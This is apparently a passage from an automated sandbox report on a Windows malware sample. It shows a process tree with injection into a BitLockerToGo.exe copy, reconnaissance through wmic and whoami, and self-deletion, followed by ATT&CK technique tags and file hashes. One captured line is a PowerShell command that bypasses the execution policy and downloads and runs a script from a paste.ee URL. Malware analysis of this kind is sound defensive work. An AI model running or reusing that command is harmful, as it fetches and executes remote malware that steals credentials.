C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4804
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵PID:1476
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵PID:380
-
-
C:\Program Files\launcher289\3.exe"C:\Program Files\launcher289\3.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups /fo csv5⤵
- System Location Discovery: System Language Discovery
PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4860
-
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵PID:3636
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Indicator Removal
1File Deletion
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.9MB
MD52414dc051accb9c35841b4bae2e49c63
SHA1c2bd21549fd193a59bbccc8ba17266d0ae8ed02d
SHA256967b4acc9d24581a6ed9b511173a257929cf1d59361eec4f31e5d37767a4565c
SHA512b2d1fda3e0ee179f41cd0f3bac071d142fbea665103e5c35eef61f5ac42f90f079ce2094cc140acc97708d21eef4d628105e0c953fefd0ec75da89e75dd7d7d9
-
Filesize
13.1MB
MD57a71d68fd14c17c55210f369432be07e
SHA1c68a576117c091a2317c41cc903daff80930b15c
SHA256a67a14776f7f9fa4ccd2ce0507416ec2c2d1a343db5076ad0828377edeba56b4
SHA5129b4784b05adb20fdaf1bdf52749a642da771d42ea2697427664926f39979992027629f42f33d5f1aac2eb41070bbe03c69898de073e02836aa71ea6b953cc710
-
Filesize
12.5MB
MD5a0dc7564cc76113554ab0a96be832dd0
SHA124936984135732a925fa9876c75307c0a9a2b25f
SHA2566b2857b2f5166a00daa2c699ee9c7c72371d8bb49eadefaaf3d81d189c1ef577
SHA51200be3708f0d770cfb0bb7e2f081334b1f60146eba34551d551751997b3ba6982674b68485c6d5c88bb461fb208d9cf61c36ceea92c1b7f16d28c5a52b1dbea70
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82